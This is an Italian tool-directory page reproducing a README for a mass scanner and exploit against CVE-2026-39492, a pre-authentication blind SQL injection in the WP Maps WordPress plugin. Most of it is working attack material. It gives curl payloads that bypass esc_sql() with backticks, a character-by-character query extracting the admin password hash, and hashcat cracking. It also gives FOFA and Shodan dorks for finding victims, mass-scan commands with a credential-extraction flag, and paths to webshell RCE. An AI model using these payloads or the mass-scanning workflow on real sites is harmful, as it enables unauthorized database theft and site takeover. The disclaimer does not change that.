Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-39492 — CVE-2026-39492 — WP Maps (wp-google-map-plugin) <= 4.9.1 Scanner di Massa per SQL Injection Blind Non Autenticata | rilevamento stile sqlmap | bypass backtick di esc_sql() | oltre 100K installazioni | Kitploit
Strumenti/GitHubGitHub/shinthink/cve-2026-39492
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubshinthink/cve-2026-39492

CVE-2026-39492

CVE-2026-39492 — WP Maps (wp-google-map-plugin) <= 4.9.1 Scanner di Massa per SQL Injection Blind Non Autenticata | rilevamento stile sqlmap | bypass backtick di esc_sql() | oltre 100K installazioni

Vedi Repository
112 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-39492 — Scansione SQL Injection Cieca su WP Maps

SQLi Cieca Time-Based pre-autenticazione con bypass backtick → Estrazione DB


Panoramica

CVE-2026-39492 è una vulnerabilità critica (CVSS 9.3) di SQL injection cieca non autenticata nel plugin WP Maps (wp-google-map-plugin) versioni ≤ 4.9.1.

Il gestore AJAX wpgmp_ajax_call è registrato tramite wp_ajax_nopriv_ per accesso non autenticato. Il parametro viene passato attraverso — una funzione che interpreta erroneamente l'input come identificatore di colonna SQL affidabile, bypassando completamente la sanificazione di WordPress.

location_id
FlipperCode_Model_Base::is_column()
racchiuso tra backtick
esc_sql()

Versioni Vulnerabili

Versione WP MapsStato
≤ 4.9.1Vulnerabile
≥ 4.9.2Corretta

Installazioni attive: 100.000+


Meccanismo della Vulnerabilità

Causa Radice

Nel livello di astrazione del database del plugin, is_column() verifica se l'input utente è racchiuso tra backtick:

root@kitploit:~
// Vulnerabile: input racchiuso tra backtick trattato come identificatore di colonna affidabile
function is_column($value) {
    if (preg_match('/^`.*`$/', $value)) {
        return true;  // bypassa completamente esc_sql()!
    }
    return false;
}

Quando is_column() restituisce true, l'input viene passato direttamente alla query SQL senza escape esc_sql(). Ciò consente:

root@kitploit:~
location_id=`1` AND SLEEP(5) AND `1`=`1

Flusso dell'Attacco

root@kitploit:~
1. Rileva WP Maps tramite readme.txt → estrae versione
2. POST verso /wp-admin/admin-ajax.php?action=wpgmp_ajax_call
3. Inietta payload racchiuso tra backtick nel parametro location_id
4. Misura il tempo di risposta — SLEEP(N) conferma SQL injection
5. Estrai dati tramite tecnica blind boolean/time-based

Perché CVSS 9.3

MetricaValore
Vettore d'AttaccoRete
Complessità d'AttaccoBassa
Privilegi RichiestiNessuno
Interazione UtenteNessuna
Impatto sulla RiservatezzaAlto
Impatto sull'IntegritàNessuno
Impatto sulla DisponibilitàBasso
PerimetroModificato (impatta l'intero DB)

Installazione

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-39492.git
cd CVE-2026-39492
pip install -r requirements.txt

Utilizzo

root@kitploit:~
# Rilevamento singolo target
python cve_2026_39492.py -t target.com

# Scansione di massa
python cve_2026_39492.py -f targets.txt

# Scansione di massa + salvataggio risultati
python cve_2026_39492.py -f targets.txt -o sqli.txt

# Singolo target con estrazione credenziali
python cve_2026_39492.py -t target.com --extract -v

# Output verboso
python cve_2026_39492.py -t target.com -v

Argomenti

root@kitploit:~
  -t, --target      Singolo target (dominio o IP)
  -f, --file        Lista di target, uno per riga
  -o, --output      Salva i target vulnerabili in un file
  --threads         Thread concorrenti (default: 20)
  --extract         Estrai credenziali admin dai target confermati
  -v, --verbose     Mostra output dettagliato

Prova di Concetto

Singolo Target

root@kitploit:~
$ python cve_2026_39492.py -t target.com -v
root@kitploit:~
  CVE-2026-39492 — Scansione SQL Injection Cieca su WP Maps
  CVSS 9.3 | Pre-Autenticazione | wpgmp_ajax_call → Bypass Backtick

  Target: WP Maps (wp-google-map-plugin) <= 4.9.1
  Vettore: admin-ajax.php?action=wpgmp_ajax_call → location_id
  Bypass: input racchiuso tra backtick bypassa esc_sql()

    [+] WP Maps rilevato: v4.9.0
    [*] Test SQLi: 6.2s (soglia: 5s)
    [+] SQLi Cieco CONFERMATO (risposta: 6.2s)

  Host        : target.com
  WP Maps     : SI v4.9.0
  SQLi        : SI
  Tempo risp  : 6.2s
  Tempo       : 7.1s

Con Estrazione Credenziali

root@kitploit:~
$ python cve_2026_39492.py -t target.com --extract -v
root@kitploit:~
    [+] SQLi Cieco CONFERMATO (risposta: 5.8s)
    [*] Estrazione credenziali admin tramite SQLi cieco...
    [*] Estrazione: admin_user
    [*] Estrazione: $P$BqVg...

  Utente Admin  : admin_user
  Hash Admin    : $P$BqVg7xX...

Scansione di Massa

root@kitploit:~
  CVE-2026-39492  Scanner SQLi Cieco WP Maps
  Target: 2500 | Thread: 20
  Vettore: wpgmp_ajax_call → bypass backtick location_id
  ───────────────────────────────────────────────────────

  [SQLi]    target-vuln.com                                 6.2s  v4.9.0       risp:6.2s
  [SQLi]    wp-maps-site.com                                5.8s  v4.8.5       risp:5.8s
  [500/2500] 20%  |  WP Maps:47  SQLi:12  |  current-target.com

  ───────────────────────────────────────────────────────
  Scansione completata  |  Tempo: 320s
  ───────────────────────────────────────────────────────
  Target          : 2500
  WP Maps trovati : 47
  SQLi confermati : 12

Sfruttamento Manuale

Passo 1 — Rileva il plugin

root@kitploit:~
curl -sk 'https://target.com/wp-content/plugins/wp-google-map-plugin/readme.txt' | head -5

Passo 2 — Testa SQLi con SLEEP

root@kitploit:~
time curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=wpgmp_ajax_call' \
  -d 'location_id=`1` AND SLEEP(5) AND `1`=`1'

# Risposta > 5 secondi → VULNERABILE

Passo 3 — Estrai hash admin tramite SQLi cieco

root@kitploit:~
# Controlla primo carattere dell'hash admin
time curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=wpgmp_ajax_call' \
  -d 'location_id=`1` AND IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36,SLEEP(3),0) AND `1`=`1'

# Risposta > 3 secondi → primo carattere è ASCII 36 = '$'

Passo 4 — Cracka hash & login → RCE completo

root@kitploit:~
hashcat -m 400 -a 0 admin_hash.txt /usr/share/wordlists/rockyou.txt

FOFA Dork

root@kitploit:~
body="wp-google-map-plugin"

Shodan

root@kitploit:~
http.html:"wp-google-map-plugin"

Impatto

Uno sfruttamento riuscito consente l'estrazione dell'intero database WordPress:

  • Hash delle password admin → crack → login admin → upload plugin → RCE
  • PII degli utenti, email, token di sessione
  • Chiavi API memorizzate in wp_options
  • Se esiste il privilegio FILE in MySQL: SELECT ... INTO OUTFILE → webshell → RCE diretto

Disclaimer

SOLO PER SCOPI EDUCATIVI E TEST AUTORIZZATI.

Questo software è destinato a professionisti della sicurezza che conducono test di penetrazione autorizzati, organizzazioni che verificano la propria infrastruttura e ricercatori che studiano lo sfruttamento di vulnerabilità.

L'accesso non autorizzato a sistemi informatici è illegale e può violare:

  • Stati Uniti: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • Indonesia: UU ITE Pasal 30 & 46
  • Unione Europea: Direttiva 2013/40/UE
  • Regno Unito: Computer Misuse Act 1990

Gli autori non si assumono alcuna responsabilità per un uso improprio.


Riferimenti

RisorsaLink
Advisory IONIXionix.io/threat-center/cve-2026-39492
Advisory WPScanwpscan.com/vulnerability/c1f19d2e
Advisory Wordfencewordfence.com
Voce NVDCVE-2026-39492
Trac Pluginwp-google-map-plugin

Questo progetto non è affiliato a Flipper Code o WP Maps.

Scarica lo strumento